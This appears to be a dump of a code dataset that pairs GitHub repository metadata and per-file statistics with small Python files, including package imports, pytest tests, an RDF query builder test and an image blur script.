0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e8a627e75e308cff7591c61f45e8aa49ef79212e
34
py
Python
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
1
2019-02-15T03:42:43.000Z
2019-02-15T03:42:43.000Z
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
1
2021-06-01T22:12:11.000Z
2021-06-01T22:12:11.000Z
src/app/__init__.py
kamilcieslik/test_house_price_app
f7c5786d0e79e23bafaedd24088aa506c04b5527
[ "MIT" ]
null
null
null
from src import MainGuiController
17
33
0.882353
4
34
7.5
1
0
0
0
0
0
0
0
0
0
0
0
0.117647
34
1
34
34
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e8c4e9b4bf333b045244e0cf0dcca3363a38fa12
31
py
Python
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
kmeans/heyo.py
davgra04/kmeans
ba481b4d329ed47a4e1bec2149a5c4a24d5e6fe7
[ "MIT" ]
null
null
null
def heyo(): print("heyo")
7.75
17
0.516129
4
31
4
0.75
0
0
0
0
0
0
0
0
0
0
0
0.258065
31
3
18
10.333333
0.695652
0
0
0
0
0
0.133333
0
0
0
0
0
0
1
0.5
true
0
0
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
1
0
6
fa06f4c164b47392c3321296e20f69265cebf9b6
109
py
Python
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
src/solr_channel/consumers/__init__.py
sonne-academic/django-middleware
6a400f279a877f26b9d320eb23f1d2b869ba5027
[ "Apache-2.0" ]
null
null
null
from .JsonRpcSolrPassthrough import JsonRpcSolrPassthrough from .JsonRpcHandlerBase import JsonRpcHandlerBase
54.5
58
0.917431
8
109
12.5
0.5
0
0
0
0
0
0
0
0
0
0
0
0.06422
109
2
59
54.5
0.980392
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.5
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
0
0
0
6
fa273803b6a2b2a3b1da4676845d8fddb4bee535
92
py
Python
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
202
2015-01-12T08:10:48.000Z
2021-11-08T09:04:32.000Z
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
30
2015-01-01T09:07:17.000Z
2021-06-03T12:58:45.000Z
test/templates/Test/apps/Hello/views.py
timgates42/uliweb
80c0459c5e5d257b665eb2e1d0b5f68ad55c42f1
[ "BSD-2-Clause" ]
58
2015-01-12T03:28:54.000Z
2022-01-14T01:58:08.000Z
#coding=utf-8 from uliweb import expose, functions @expose('/') def index(): return {}
13.142857
36
0.663043
12
92
5.083333
0.916667
0
0
0
0
0
0
0
0
0
0
0.013158
0.173913
92
6
37
15.333333
0.789474
0.130435
0
0
0
0
0.012658
0
0
0
0
0
0
1
0.25
true
0
0.25
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
ad1c8cf713b468a732d8e0bb0882116dc5d81f26
44
py
Python
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
ionmq/__init__.py
anton-trapeznikov/ion-mq
2c7a8602a0d6f870bdfb8605b65c3ed404579998
[ "MIT" ]
null
null
null
from .ionmq import IonMQBroker, IonMQClient
22
43
0.840909
5
44
7.4
1
0
0
0
0
0
0
0
0
0
0
0
0.113636
44
1
44
44
0.948718
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
ad57ec65ddbd78655fcf214f9159b4c5dc4670cf
23
py
Python
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
null
null
null
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
1
2021-10-18T09:59:45.000Z
2021-10-18T09:59:45.000Z
a.3.2.py
AmanMishra148/python-repo
5b07fe19f2058fc2c909b96ae173f4346ac8d3da
[ "bzip2-1.0.6" ]
4
2021-10-18T09:40:54.000Z
2021-10-19T14:14:28.000Z
import A1 print(A1.a)
5.75
11
0.695652
5
23
3.2
0.8
0
0
0
0
0
0
0
0
0
0
0.105263
0.173913
23
3
12
7.666667
0.736842
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
ad7575b6d31432d7c404c976e0e636141bad5a7c
24
py
Python
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
6
2021-06-13T14:56:30.000Z
2022-02-02T14:41:06.000Z
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
1
2021-04-27T07:42:55.000Z
2021-07-12T08:36:26.000Z
src/__init__.py
anishLearnsToCode/word-sense-disambiguation
1613e1d929cb08c2dfb6ee264bb218cae91ad43e
[ "MIT" ]
null
null
null
from src.utils import *
12
23
0.75
4
24
4.5
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
d12c76c3aca8032c7d80901ecd820f23d356ac98
69
py
Python
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
banana_octo_py/core.py
charlesreid1/banana-octo-py
aab96d7550121dc876ebcac7d0343aebda9199c8
[ "MIT" ]
null
null
null
def hello_core(): return "Hello world! This is the core.py file"
23
50
0.695652
12
69
3.916667
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.202899
69
2
51
34.5
0.854545
0
0
0
0
0
0.536232
0
0
0
0
0
0
1
0.5
true
0
0
0.5
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
d1614aa253ffee1dccb9de3a055a0c6f839beba6
3,632
py
Python
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
42
2020-03-25T16:47:30.000Z
2022-01-31T21:26:38.000Z
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
367
2020-04-08T12:46:34.000Z
2022-02-16T01:15:32.000Z
tests/river/unit/topicleaner/test_service.py
arkhn/fhir-river
a12179c34fad131d16dedc20c61297ed83d805e6
[ "Apache-2.0" ]
3
2020-05-14T08:24:46.000Z
2021-08-04T05:00:16.000Z
import pytest from river.adapters.progression_counter import InMemoryProgressionCounter from river.adapters.topics import InMemoryTopicsManager from river.topicleaner.service import clean pytestmark = pytest.mark.django_db def test_done_batch_is_cleaned(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 10} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics == set() def test_done_batch_is_cleaned_with_failed(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={ f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 6, "failed": 4} for resource in batch.resources.all() } ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics == set() def test_ongoing_batch_is_not_cleaned(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 9} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_ongoing_batch_is_not_cleaned_with_failed(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={ f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 6, "failed": 2} for resource in batch.resources.all() } ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_none_counter_prevents_cleaning(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": None, "loaded": 10} for resource in batch.resources.all()} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set() def test_missing_counter_prevents_cleaning(batch_factory, resource_factory): r1, r2 = resource_factory.create_batch(2) batch = batch_factory.create(resources=[r1, r2]) counters = InMemoryProgressionCounter( counts={f"{batch.id}:{resource.id}": {"extracted": 10, "loaded": 10} for resource in batch.resources.all()[1:]} ) topics = InMemoryTopicsManager( topics=[f"{base_topic}.{batch.id}" for base_topic in ["batch", "extract", "transform", "load"]] ) clean(counters, topics) assert topics._topics != set()
35.262136
119
0.680617
427
3,632
5.601874
0.138173
0.060201
0.050167
0.067726
0.910535
0.910535
0.898411
0.898411
0.898411
0.898411
0
0.017461
0.180066
3,632
102
120
35.607843
0.785762
0
0
0.597403
0
0
0.147026
0.077643
0
0
0
0
0.077922
1
0.077922
false
0
0.051948
0
0.12987
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0f37b5f6dd8091ae9f4b14870ad10b136c902c51
119
py
Python
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
mediafeed/wsgi.py
media-feed/mediafeed
c2fb37b20a5bc41a4299193fa9b11f8a3e3b2acf
[ "MIT" ]
null
null
null
from . import init, start_background_jobs from .api.server import application # NOQA init() start_background_jobs()
17
43
0.789916
16
119
5.625
0.625
0.2
0.422222
0.511111
0
0
0
0
0
0
0
0
0.134454
119
6
44
19.833333
0.873786
0.033613
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
0f4cfbd667d25b80cc0bd40ae44b69396a8703a0
26
py
Python
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
71
2015-10-25T16:50:18.000Z
2022-03-02T03:46:19.000Z
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
336
2015-02-11T22:39:54.000Z
2022-02-22T18:42:32.000Z
raysect/optical/library/glass/__init__.py
Gjacquenot/source
5f9b86bbb44c25b5096d637d65e41e257a9bda3c
[ "BSD-3-Clause" ]
24
2016-09-11T17:12:10.000Z
2022-02-24T22:57:09.000Z
from .schott import schott
26
26
0.846154
4
26
5.5
0.75
0
0
0
0
0
0
0
0
0
0
0
0.115385
26
1
26
26
0.956522
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0f618b7c1df9610db9658175c8f6b7b6f63756b9
37
py
Python
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
12/RoomPlan.py
pipSu/Algorithm_Assignment
95becdbf34091b6461b4b1acd916c5a4e74dfd4d
[ "MIT" ]
null
null
null
def __main(): def __main()
3.7
13
0.486486
4
37
3.5
0.5
1
0
0
0
0
0
0
0
0
0
0
0.378378
37
9
14
4.111111
0.608696
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
7e14aa0f55fce058bc632ef94e78c3509bb3079a
4,004
py
Python
rdfframes/test_queries/test_aggregation.py
qcri/RDFframe
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
13
2019-07-06T00:10:11.000Z
2022-02-20T02:14:16.000Z
rdfframes/test_queries/test_aggregation.py
qcri/RDFrame
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
1
2019-05-20T08:51:42.000Z
2019-05-20T08:51:42.000Z
rdfframes/test_queries/test_aggregation.py
qcri/RDFframe
2a50105479051c134cc5eddc9e20d55b755ef765
[ "MIT" ]
3
2020-04-17T10:50:37.000Z
2022-03-23T01:30:16.000Z
from rdfframes.knowledge_graph import KnowledgeGraph def test_simple_query(): # create a knowledge graph to store the graph uri and prefixes graph = KnowledgeGraph('twitter', 'https://twitter.com', prefixes={ "rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "sioc": "http://rdfs.org/sioc/ns#", "sioct": "http://rdfs.org/sioc/types#", "to": "http://twitter.com/ontology/", "dcterms": "http://purl.org/dc/terms/", "xsd": "http://www.example.org/", "foaf": "http://xmlns.com/foaf/0.1/" }) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count(src_col_name='tweet', new_col_name='tweet_count', unique=True) sparql_query = dataset.to_sparql() print("sparql_query that returns each user and his unique tweet count =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count('tweet') sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets per user without unique =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.group_by(['tweep']).count('tweet', new_col_name='n_tweets').sum('n_tweets') sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets as the sum of tweets per user without unique =\n{}\n".format(sparql_query)) dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False), ('sioc:content', 'text', False) ]) dataset = dataset.count("tweet", unique=True) sparql_query = dataset.to_sparql() print("sparql_query that returns the number of tweets =\n{}\n".format(sparql_query)) # return all the instances of the tweet class dataset = graph.entities(class_name='sioc:microblogPost', new_dataset_name='tweets', entities_col_name='tweet') dataset = dataset.expand(src_col_name='tweet', predicate_list=[ ('sioc:has_creater', 'tweep', False) ]) dataset = dataset.group_by(['tweep']).count(src_col_name='tweet', new_col_name='tweet_count', unique=True) dataset = dataset.expand(src_col_name='tweep', predicate_list=[('sioc:content', 'text', False)]) sparql_query = dataset.to_sparql() print("sparql_query that returns the tweep, tweet_count, text of each tweet =\n{}\n".format(sparql_query)) # TODO: make sure this actually returns the expected result if __name__ == '__main__': test_simple_query()
49.432099
133
0.600649
472
4,004
4.883475
0.205508
0.04859
0.072885
0.045553
0.760954
0.752712
0.739696
0.739696
0.739696
0.739696
0
0.003744
0.266234
4,004
80
134
50.05
0.780803
0.073427
0
0.625
0
0
0.291115
0
0
0
0
0.0125
0
1
0.015625
false
0
0.015625
0
0.03125
0.078125
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
6
7e59f06a617223cc10fb7198fe2dd71643fc5f54
9,364
py
Python
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
stanCode_Projects/my_photoshop/blur.py
clairejrlin/stanCode_projects
452a93f9db2de610d0580faecca80b3c3d311395
[ "MIT" ]
null
null
null
""" File: blur.py ------------------------------- This file shows the original image(smiley-face.png) first, and then its blurred image. The blur algorithm uses the average RGB values of a pixel's nearest neighbors. """ from simpleimage import SimpleImage def blur(img): """ :param img: SimpleImage, original image. :return: SimpleImage, blurred image. """ new_img = SimpleImage.blank(img.width, img.height) for y in range(img.height): for x in range(img.width): if (img.width - 1) > x >= 1 and (img.height - 1) > y >= 1: # for the pixel inside. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_3.red + pixel_4.red + pixel_start.red + pixel_6.red + pixel_7.red + pixel_8.red + pixel_9.red) // 9 avg_green = (pixel_1.green + pixel_2.green + pixel_3.green + pixel_4.green + pixel_start.green + pixel_6.green + pixel_7.green + pixel_8.green + pixel_9.green) // 9 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_3.blue + pixel_4.blue + pixel_start.blue + pixel_6.blue + pixel_7.blue + pixel_8.blue + pixel_9.blue) // 9 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and (img.height - 1) > y >= 1: # for pixel which were on the left edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_6 = img.get_pixel(x + 1, y) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_2.red + pixel_3.red + pixel_start.red + pixel_6.red + pixel_8.red + pixel_9.red) // 6 avg_green = (pixel_2.green + pixel_3.green + pixel_start.green + pixel_6.green + pixel_8.green + pixel_9.green) // 6 avg_blue = (pixel_2.blue + pixel_3.blue + pixel_start.blue + pixel_6.blue + pixel_8.blue + pixel_9.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif (img.width - 1) > x >= 1 and y == 0: # for pixel which were on the top edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_4.red + pixel_start.red + pixel_6.red + pixel_7.red + pixel_8.red + pixel_9.red) // 6 avg_green = (pixel_4.green + pixel_start.green + pixel_6.green + pixel_7.green + pixel_8.green + pixel_9.green) // 6 avg_blue = (pixel_4.blue + pixel_start.blue + pixel_6.blue + pixel_7.blue + pixel_8.blue + pixel_9.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and (img.height - 1) > y >= 1: # for pixel which were on the right edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_4.red + pixel_start.red + pixel_7.red + pixel_8.red) // 6 avg_green = (pixel_1.green + pixel_2.green + pixel_4.green + pixel_start.green + pixel_7.green + pixel_8.green) // 6 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_4.blue + pixel_start.blue + pixel_7.blue + pixel_8.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif (img.width - 1) > x >= 1 and y == img.height - 1: # for pixel which were on the bottom edge. pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_4 = img.get_pixel(x - 1, y) pixel_6 = img.get_pixel(x + 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_3.red + pixel_4.red + pixel_start.red + pixel_6.red) // 6 avg_green = (pixel_1.green + pixel_2.green + pixel_3.green + pixel_4.green + pixel_start.green + pixel_6.green) // 6 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_3.blue + pixel_4.blue + pixel_start.blue + pixel_6.blue) // 6 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and y == 0: # for pixel in the corner (0, 0). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_6 = img.get_pixel(x + 1, y) pixel_8 = img.get_pixel(x, y + 1) pixel_9 = img.get_pixel(x + 1, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_start.red + pixel_6.red + pixel_8.red + pixel_9.red) // 4 avg_green = (pixel_start.green + pixel_6.green + pixel_8.green + pixel_9.green) // 4 avg_blue = (pixel_start.blue + pixel_6.blue + pixel_8.blue + pixel_9.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and y == 0: # for pixel in the corner (x, 0). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_4 = img.get_pixel(x - 1, y) pixel_7 = img.get_pixel(x - 1, y + 1) pixel_8 = img.get_pixel(x, y + 1) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_4.red + pixel_start.red + pixel_7.red + pixel_8.red) // 4 avg_green = (pixel_4.green + pixel_start.green + pixel_7.green + pixel_8.green) // 4 avg_blue = (pixel_4.blue + pixel_start.blue + pixel_7.blue + pixel_8.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == 0 and y == img.height - 1: # for pixel in the corner (0, y). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_2 = img.get_pixel(x, y - 1) pixel_3 = img.get_pixel(x + 1, y - 1) pixel_6 = img.get_pixel(x + 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_2.red + pixel_3.red + pixel_start.red + pixel_6.red) // 4 avg_green = (pixel_2.green + pixel_3.green + pixel_start.green + pixel_6.green) // 4 avg_blue = (pixel_2.blue + pixel_3.blue + pixel_start.blue + pixel_6.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue elif x == img.width - 1 and y == img.height - 1: # for pixel in the corner (x, y). pixel_start = img.get_pixel(x, y) # pixel_5 pixel_1 = img.get_pixel(x - 1, y - 1) pixel_2 = img.get_pixel(x, y - 1) pixel_4 = img.get_pixel(x - 1, y) new_pixel = new_img.get_pixel(x, y) avg_red = (pixel_1.red + pixel_2.red + pixel_4.red + pixel_start.red) // 4 avg_green = (pixel_1.green + pixel_2.green + pixel_4.green + pixel_start.green) // 4 avg_blue = (pixel_1.blue + pixel_2.blue + pixel_4.blue + pixel_start.blue) // 4 new_pixel.red = avg_red new_pixel.green = avg_green new_pixel.blue = avg_blue return new_img def main(): """ TODO: """ old_img = SimpleImage("images/smiley-face.png") old_img.show() blurred_img = blur(old_img) for i in range(5): blurred_img = blur(blurred_img) blurred_img.show() if __name__ == '__main__': main()
48.770833
118
0.521572
1,400
9,364
3.217857
0.055714
0.077248
0.14162
0.154495
0.885905
0.882797
0.874584
0.871476
0.854384
0.853052
0
0.047378
0.366617
9,364
191
119
49.026178
0.71219
0.072191
0
0.632653
0
0
0.003477
0.00255
0
0
0
0.005236
0
1
0.013605
false
0
0.006803
0
0.027211
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0e370c775c1faf7e2338ca28071392b5203e7342
147
py
Python
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
Layers/__init__.py
michalnand/machine_vision
66391b78bf1ccfc67bffdfbc6530c6b339334766
[ "MIT" ]
null
null
null
from .Thresholding import * from .AdaptiveThresholding import * from .Edges import * from .Corners import *
36.75
36
0.571429
12
147
7
0.5
0.357143
0
0
0
0
0
0
0
0
0
0
0.37415
147
4
37
36.75
0.913043
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7ec1eb7a080abc8e97cb21b21def5aa3f226460c
117
py
Python
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
tests/conftest.py
asyncee/pycamunda
f4834d224ff99fcf80874efeaedf68a8a2efa926
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import pytest @pytest.fixture def engine_url(): return 'http://localhost/engine-rest'
13
41
0.65812
15
117
5.066667
0.866667
0
0
0
0
0
0
0
0
0
0
0.010204
0.162393
117
8
42
14.625
0.765306
0.179487
0
0
0
0
0.297872
0
0
0
0
0
0
1
0.25
true
0
0.25
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
1
1
0
0
6
7ee9a8b8ae242dab3019f8cc9e7d3cba9dabc3c9
116
py
Python
src/lesson_language_tools/inspect_getmembers_class_methods_b.py
jasonwee/asus-rt-n14uhp-mrtg
4fa96c3406e32ea6631ce447db6d19d70b2cd061
[ "Apache-2.0" ]
3
2018-08-14T09:33:52.000Z
